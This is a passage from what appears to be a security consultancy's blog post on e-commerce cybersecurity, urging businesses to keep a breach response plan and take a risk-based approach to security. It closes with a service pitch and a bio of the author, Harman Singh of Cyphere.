Be prepared. It might sound like the most pessimistic recommendation in this article; however, an incident response plan covering data breach response must be in place. It limits the damage in the event of a breach by helping you decide on the next course of action quickly.
Successful e-Commerce is a win-win for all parties, businesses and consumers alike. Covid-19 has forced businesses to adopt new approaches, especially mobile growth for e-Commerce businesses, and pushed brick-and-mortar stores towards online business models. Just as consumer patterns change, the cybersecurity strategy of e-Commerce businesses needs to improve.
Cybersecurity is an ongoing process. The recommendations throughout this article are not a silver bullet that makes your business impenetrable. A risk-focused, prioritised approach may be necessary depending on your organisation's cyber security maturity; it helps identify vulnerabilities and prioritise mitigation of the security issues. Retail businesses need to treat cybersecurity as a holistic solution protecting people, process and technology as well as consumer information. If the corporate environment is compromised, theft of IP or consumer information can still hurt the business in the short to medium term. Aligning cybersecurity to act as an enabler for business growth is less costly in the long term.
Your business may benefit from our offerings around web and mobile applications and services, specific infrastructure areas or a holistic IT security health check to identify gaps in your current infrastructure. Get in touch for a non-salesy chat about your primary security concerns.
Harman Singh is a security professional with over 15 years of consulting experience in both public and private sectors.
As the Managing Consultant at Cyphere, he provides cyber security services to retailers, fintech companies, SaaS providers, housing and social care, construction and more. Harman specialises in technical risk assessments, penetration testing and security strategy.
He regularly speaks at industry events, has been a trainer at prestigious conferences such as Black Hat and shares his expertise on topics such as ‘less is more’ when it comes to cybersecurity. He is a strong advocate for ensuring cyber security as an enabler for business growth.
In addition to his consultancy work, Harman is an active blogger and author who has written articles for Infosecurity Magazine, VentureBeat and other websites.